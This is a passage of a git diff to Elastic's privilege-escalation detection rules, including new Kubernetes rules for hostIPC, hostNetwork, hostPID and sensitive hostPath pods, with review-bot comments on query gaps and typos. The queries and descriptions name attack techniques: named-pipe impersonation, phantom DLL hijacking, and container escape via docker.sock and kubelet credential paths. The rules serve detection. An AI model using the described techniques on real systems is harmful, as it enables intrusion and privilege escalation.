b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_local_user_added_to_admin.json index 72c3bfc9a520c..36f17ffc44666 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_local_user_added_to_admin.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_local_user_added_to_admin.json @@ -15,6 +15,28 @@ "references": [ "https://managingosx.wordpress.com/2010/01/14/add-a-user-to-the-admin-group-via-command-line-3-0/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "565c2b44-7a21-4818-955f-8d4737967d2e", "severity": "medium", @@ -51,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_lsa_auth_package.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_lsa_auth_package.json index 9b5ae8b997b74..9d02b4420ef6c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_lsa_auth_package.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_lsa_auth_package.json 
@@ -11,6 +11,23 @@ "license": "Elastic License v2", "name": "Potential LSA Authentication Package Abuse", "query": "registry where event.type == \"change\" and\n registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Authentication Packages\" and\n /* exclude SYSTEM SID - look for changes by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb", "severity": "medium", @@ -69,5 +86,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_sudo_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ml_linux_anomalous_sudo_activity.json similarity index 100% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_sudo_activity.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ml_linux_anomalous_sudo_activity.json 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_rare_user_runas_event.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ml_windows_rare_user_runas_event.json similarity index 79% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_rare_user_runas_event.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ml_windows_rare_user_runas_event.json index 6c9845699b723..ab8d1ede513d7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_rare_user_runas_event.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ml_windows_rare_user_runas_event.json @@ -25,8 +25,20 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [] + } ], "type": "machine_learning", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_named_pipe_impersonation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_named_pipe_impersonation.json index f903528dd5918..cc1b08700e342 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_named_pipe_impersonation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_named_pipe_impersonation.json 
@@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Privilege Escalation via Named Pipe Impersonation", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and \n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", "references": [ "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -46,5 +64,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_new_or_modified_federation_domain.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_new_or_modified_federation_domain.json index c808635f20fb7..0e211de261a13 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_new_or_modified_federation_domain.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_new_or_modified_federation_domain.json @@ -10,8 +10,8 @@ "language": "kuery", "license": "Elastic License v2", "name": "New or Modified Federation Domain", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Set-AcceptedDomain\" or \n\"Set-MsolDomainFederationSettings\" or \"Add-FederatedDomain\" or \"New-AcceptedDomain\" or \"Remove-AcceptedDomain\" or \"Remove-FederatedDomain\") and \nevent.outcome:success\n", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Set-AcceptedDomain\" or\n\"Set-MsolDomainFederationSettings\" or \"Add-FederatedDomain\" or \"New-AcceptedDomain\" or \"Remove-AcceptedDomain\" or \"Remove-FederatedDomain\") and\nevent.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-accepteddomain?view=exchange-ps", "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-federateddomain?view=exchange-ps", 
@@ -20,8 +20,42 @@ "https://docs.microsoft.com/en-us/powershell/module/exchange/set-accepteddomain?view=exchange-ps", "https://docs.microsoft.com/en-us/powershell/module/msonline/set-msoldomainfederationsettings?view=azureadps-1.0" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "684554fc-0777-47ce-8c9b-3d01f198d7f8", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -57,5 +91,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_persistence_phantom_dll.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_persistence_phantom_dll.json index f53cbab5c3827..e5f2082a16ac1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_persistence_phantom_dll.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_persistence_phantom_dll.json 
@@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious DLL Loaded for Persistence or Privilege Escalation", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "library where dll.name :\n (\n \"wlbsctrl.dll\",\n \"wbemcomn.dll\",\n \"WptsExtensions.dll\",\n \"Tsmsisrv.dll\",\n \"TSVIPSrv.dll\",\n \"Msfte.dll\",\n \"wow64log.dll\",\n \"WindowsCoreDeviceInfo.dll\",\n \"Ualapi.dll\",\n \"wlanhlp.dll\",\n \"phoneinfo.dll\",\n \"EdgeGdi.dll\",\n \"cdpsgshims.dll\",\n \"windowsperformancerecordercontrol.dll\",\n \"diagtrack_win.dll\"\n ) and \nnot (dll.code_signature.subject_name : (\"Microsoft Windows\", \"Microsoft Corporation\") and dll.code_signature.status : \"trusted\")\n", + "note": "", + "query": "any where\n (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (\n /* compatible with Elastic Endpoint Library Events */\n (dll.name : (\"wlbsctrl.dll\", \"wbemcomn.dll\", \"WptsExtensions.dll\", \"Tsmsisrv.dll\", \"TSVIPSrv.dll\", \"Msfte.dll\",\n \"wow64log.dll\", \"WindowsCoreDeviceInfo.dll\", \"Ualapi.dll\", \"wlanhlp.dll\", \"phoneinfo.dll\", \"EdgeGdi.dll\",\n \"cdpsgshims.dll\", \"windowsperformancerecordercontrol.dll\", \"diagtrack_win.dll\")\n and (dll.code_signature.trusted == false or dll.code_signature.exists == false)) or\n\n /* compatible with Sysmon EventID 7 - Image Load */\n (file.name : (\"wlbsctrl.dll\", \"wbemcomn.dll\", \"WptsExtensions.dll\", \"Tsmsisrv.dll\", \"TSVIPSrv.dll\", \"Msfte.dll\",\n \"wow64log.dll\", \"WindowsCoreDeviceInfo.dll\", \"Ualapi.dll\", \"wlanhlp.dll\", \"phoneinfo.dll\", \"EdgeGdi.dll\",\n \"cdpsgshims.dll\", \"windowsperformancerecordercontrol.dll\", 
\"diagtrack_win.dll\")\n and not file.code_signature.status == \"Valid\")\n )\n", "references": [ "https://itm4n.github.io/windows-dll-hijacking-clarified/", "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", @@ -22,8 +22,46 @@ "https://windows-internals.com/faxing-your-way-to-system/", "http://waleedassar.blogspot.com/2013/01/wow64logdll.html" ], + "required_fields": [ + { + "ecs": true, + "name": "dll.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -81,5 +119,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pkexec_envar_hijack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pkexec_envar_hijack.json index 298cb77347f04..56befaee38873 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pkexec_envar_hijack.json 
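Review bot: The Sysmon branch of the rewritten query rejects only `file.code_signature.status == "Valid"`, while the Endpoint branch keys on `dll.code_signature.trusted == false or dll.code_signature.exists == false`; if I read EQL's null handling right, a comparison on a missing field yields null and `not null` does not match, so an image-load event that carries no `file.code_signature.status` at all would be dropped rather than flagged. Whether that field is always populated for unsigned loads depends on the Sysmon/winlogbeat mapping, which is not visible here; if it can be absent, `(file.code_signature.status == null or not file.code_signature.status == "Valid")` keeps such loads in scope. A one-line comment in the query, `/* status may be absent for unsigned images - see mapping */`, would record the assumption either way.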
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pkexec_envar_hijack.json @@ -15,6 +15,13 @@ "https://seclists.org/oss-sec/2022/q1/80", "https://haxx.in/files/blasty-vs-pkexec.c" ], + "required_fields": [ + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9", "severity": "high", @@ -66,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostipc.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostipc.json new file mode 100644 index 0000000000000..16e326094cb1e --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostipc.json 
@@ -0,0 +1,70 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects an attempt to create or modify a pod using the host IPC namespace. This gives access to data used by any pod that also use the host\ufffds IPC namespace. If any process on the host or any processes in a pod uses the host\ufffds inter-process communication mechanisms (shared memory, semaphore arrays, message queues, etc.), an attacker can read/write to those same mechanisms. They may look for files in /dev/shm or use ipcs to check for any IPC facilities being used.",
+ "false_positives": [
+ "An administrator or developer may want to use a pod that runs as root and shares the host\ufffds IPC, Network, and PID namespaces for debugging purposes. If something is going wrong in the cluster and there is no easy way to SSH onto the host nodes directly, a privileged pod of this nature can be useful for viewing things like iptable rules and network namespaces from the host's perspective."
+ ],
+ "index": [
+ "logs-kubernetes.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Pod Created With HostIPC",
+ "note": "",
+ "query": "kubernetes.audit.objectRef.resource:\"pods\" and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\") and kubernetes.audit.requestObject.spec.hostIPC:true\n",
+ "references": [
+ "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections",
+ "https://kubernetes.io/docs/concepts/security/pod-security-policy/#host-namespaces",
+ "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation"
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.objectRef.resource",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.hostIPC",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.verb",
+ "type": "unknown"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "764c8437-a581-4537-8060-1fdb0e92c92d",
+ "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Elastic",
+ "Kubernetes",
+ "Continuous Monitoring",
+ "Execution",
+ "Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1611",
+ "name": "Escape to Host",
+ "reference": "https://attack.mitre.org/techniques/T1611/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 2
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostnetwork.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostnetwork.json
new file mode 100644
index 0000000000000..513e3f3bf27ac
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostnetwork.json
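Review bot: The `description` and `false_positives` strings carry `\ufffd` (the Unicode replacement character) where an apostrophe belongs, so the rule renders as `host�s IPC` in the rule details page; `host's` (or `\u2019`) is the intended text. The same replacement character sits in the `false_positives` entry of the HostNetwork and HostPID rules in the next two hunks, and the HostNetwork `description` also reads `This rules detects`. The `tags` list names `Execution` while `threat` maps only TA0004, so either a TA0002 tactic entry belongs in `threat` or the `Execution` tag should go; the same tag/threat mismatch is present in the HostNetwork, HostPID, hostPath and privileged-pod rules that follow.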
@@ -0,0 +1,70 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rules detects an attempt to create or modify a pod attached to the host network. HostNetwork allows a pod to use the node network namespace. Doing so gives the pod access to any service running on localhost of the host. An attacker could use this access to snoop on network activity of other pods on the same node or bypass restrictive network policies applied to its given namespace.",
+ "false_positives": [
+ "An administrator or developer may want to use a pod that runs as root and shares the host\ufffds IPC, Network, and PID namespaces for debugging purposes. If something is going wrong in the cluster and there is no easy way to SSH onto the host nodes directly, a privileged pod of this nature can be useful for viewing things like iptable rules and network namespaces from the host's perspective."
+ ],
+ "index": [
+ "logs-kubernetes.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Pod Created With HostNetwork",
+ "note": "",
+ "query": "kubernetes.audit.objectRef.resource:\"pods\" and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\") and kubernetes.audit.requestObject.spec.hostNetwork:true\n",
+ "references": [
+ "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections",
+ "https://kubernetes.io/docs/concepts/security/pod-security-policy/#host-namespaces",
+ "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation"
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.objectRef.resource",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.hostNetwork",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.verb",
+ "type": "unknown"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "12cbf709-69e8-4055-94f9-24314385c27e",
+ "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Elastic",
+ "Kubernetes",
+ "Continuous Monitoring",
+ "Execution",
+ "Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1611",
+ "name": "Escape to Host",
+ "reference": "https://attack.mitre.org/techniques/T1611/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 2
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostpid.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostpid.json
new file mode 100644
index 0000000000000..670479cfbd907
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_hostpid.json
@@ -0,0 +1,70 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects an attempt to create or modify a pod attached to the host PID namespace. HostPID allows a pod to access all the processes running on the host and could allow an attacker to take malicious action. When paired with ptrace this can be used to escalate privileges outside of the container. When paired with a privileged container, the pod can see all of the processes on the host. An attacker can enter the init system (PID 1) on the host. From there, they could execute a shell and continue to escalate privileges to root.",
+ "false_positives": [
+ "An administrator or developer may want to use a pod that runs as root and shares the host\ufffds IPC, Network, and PID namespaces for debugging purposes. If something is going wrong in the cluster and there is no easy way to SSH onto the host nodes directly, a privileged pod of this nature can be useful for viewing things like iptable rules and network namespaces from the host's perspective."
+ ],
+ "index": [
+ "logs-kubernetes.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Pod Created With HostPID",
+ "note": "",
+ "query": "kubernetes.audit.objectRef.resource:\"pods\" and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\") and kubernetes.audit.requestObject.spec.hostPID:true\n",
+ "references": [
+ "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections",
+ "https://kubernetes.io/docs/concepts/security/pod-security-policy/#host-namespaces",
+ "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation"
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.objectRef.resource",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.hostPID",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.verb",
+ "type": "unknown"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "df7fda76-c92b-4943-bc68-04460a5ea5ba",
+ "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Elastic",
+ "Kubernetes",
+ "Continuous Monitoring",
+ "Execution",
+ "Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1611",
+ "name": "Escape to Host",
+ "reference": "https://attack.mitre.org/techniques/T1611/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 2
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_sensitive_hospath_volume.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_sensitive_hospath_volume.json
new file mode 100644
index 0000000000000..a3b546c4de372
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_pod_created_with_sensitive_hospath_volume.json
@@ -0,0 +1,69 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects when a pod is created with a sensitive volume of type hostPath. A hostPath volume type mounts a sensitive file or folder from the node to the container. If the container gets compromised, the attacker can use this mount for gaining access to the node. There are many ways a container with unrestricted access to the host filesystem can escalate privileges, including reading data from other containers, and accessing tokens of more privileged pods.",
+ "false_positives": [
+ "An administrator may need to attach a hostPath volume for a legitimate reason. This alert should be investigated for legitimacy by determining if the kuberenetes.audit.requestObject.spec.volumes.hostPath.path triggered is one needed by its target container/pod. For example, when the fleet managed elastic agent is deployed as a daemonset it creates several hostPath volume mounts, some of which are sensitive host directories like /proc, /etc/kubernetes, and /var/log."
+ ],
+ "index": [
+ "logs-kubernetes.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Pod created with a Sensitive hostPath Volume",
+ "note": "",
+ "query": "kubernetes.audit.objectRef.resource:\"pods\" \n and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\") \n and kubernetes.audit.requestObject.spec.volumes.hostPath.path:(\"/\" or \"/proc\" or \"/root\" or \"/var\" or \"/var/run/docker.sock\" or \"/var/run/crio/crio.sock\" or \"/var/run/cri-dockerd.sock\" or \"/var/lib/kubelet\" or \"/var/lib/kubelet/pki\" or \"/var/lib/docker/overlay2\" or \"/etc\" or \"/etc/kubernetes\" or \"/etc/kubernetes/manifests\" or \"/home/admin\")\n",
+ "references": [
+ "https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216",
+ "https://kubernetes.io/docs/concepts/storage/volumes/#hostpath"
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.objectRef.resource",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.volumes.hostPath.path",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.verb",
+ "type": "unknown"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "2abda169-416b-4bb3-9a6b-f8d239fd78ba",
+ "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Elastic",
+ "Kubernetes",
+ "Continuous Monitoring",
+ "Execution",
+ "Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1611",
+ "name": "Escape to Host",
+ "reference": "https://attack.mitre.org/techniques/T1611/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 2
+}
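Review bot: The `false_positives` text misspells the field as `kuberenetes.audit.requestObject.spec.volumes.hostPath.path`; an analyst who copies that name into a filter gets no matches, so it should read `kubernetes.audit.requestObject.spec.volumes.hostPath.path` as in `required_fields`. The `query` compares `hostPath.path` against a fixed list of literal paths, so a mount of a child such as `/etc/kubernetes/pki` or `/var/lib/docker` (or any listed directory written with a trailing slash) is not matched; if the field is mapped as a keyword, wildcard terms such as `"/etc/kubernetes*"` would cover the subtrees, and a short comment in `note` recording that the list is exact-match would help whoever tunes it. The file name in the header also reads `hospath` rather than `hostpath`, which makes the rule hard to find by name.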
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_port_monitor_print_pocessor_abuse.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_port_monitor_print_pocessor_abuse.json index 0eb2a7e01a1d1..0da6a25a38957 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_port_monitor_print_pocessor_abuse.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_port_monitor_print_pocessor_abuse.json @@ -14,6 +14,28 @@ "references": [ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8f3e91c7-d791-4704-80a1-42c160d7aa27", "severity": "medium", @@ -72,5 +94,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_registry_copyfiles.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_registry_copyfiles.json index 3d84e33c83791..b3cf8097ef48f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_registry_copyfiles.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_registry_copyfiles.json 
